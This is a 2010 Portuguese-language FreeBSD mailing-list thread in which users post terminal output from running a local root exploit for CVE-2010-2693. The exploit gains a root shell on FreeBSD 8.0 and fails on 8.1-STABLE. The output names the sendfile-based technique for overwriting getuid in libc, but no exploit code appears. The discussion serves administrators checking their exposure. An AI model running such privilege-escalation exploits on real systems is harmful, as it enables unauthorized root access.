[FUG-BR] FreeBSD 8.x 7.x generic private local root exploit Hacktro
Renato Frederick
renato em frederick.eti.br
Domingo Agosto 22 19:25:03 BRT 2010
funciona no 8.1 nao garga:
FreeBSD koopa.frederick.eti.br 8.1-STABLE FreeBSD 8.1-STABLE #0: Thu Aug
19 19:53:16 BRT 2010
root em koopa.frederick.eti.br:/usr/src/sys/i386/compile/KOOPA i386
$ whoami
frederick
$ ./cve-2010-2693
[+] checking for setuid /usr/bin/su binary...
[+] checking for suitable libc library in /lib...
[+] found libc at /lib/libc.so.7
[+] found getuid function at 0x00049b08
[+] target: 0x00049b08, adjusted: 0x00049308, writes: 1171
[+] spawning listener thread...
[+] connecting to listener thread...
[+] initiating exploit via sendfile...
[+] exploit complete!
[+] spawning root shell...
Password:
Em 22/08/10 19:18, Renato Botelho escreveu:
> 2010/8/22 Leandro Keffer<keffer666 em gmail.com>
>
>> Testado em um 8.0 branch 3 e funcionando : (
>>
>> FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue
>> May 25 20:54:11 UTC 2010
>> root em amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC
>> amd64
>>
>> [keffer em fbsd80 /usr/home/keffer]$ ./cve-2010-2693
>> [+] checking for setuid /usr/bin/su binary...
>> [+] checking for suitable libc library in /lib...
>> [+] found libc at /lib/libc.so.7
>> [+] found getuid function at 0x00056990
>> [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377
>> [+] spawning listener thread...
>> [+] connecting to listener thread...
>> [+] initiating exploit via sendfile...
>> [+] exploit complete!
>> [+] spawning root shell...
>> fbsd80# id
>> uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
>>
>>
> Sabe se rola no 8.1-RELEASE?
>
Mais detalhes sobre a lista de discussão freebsd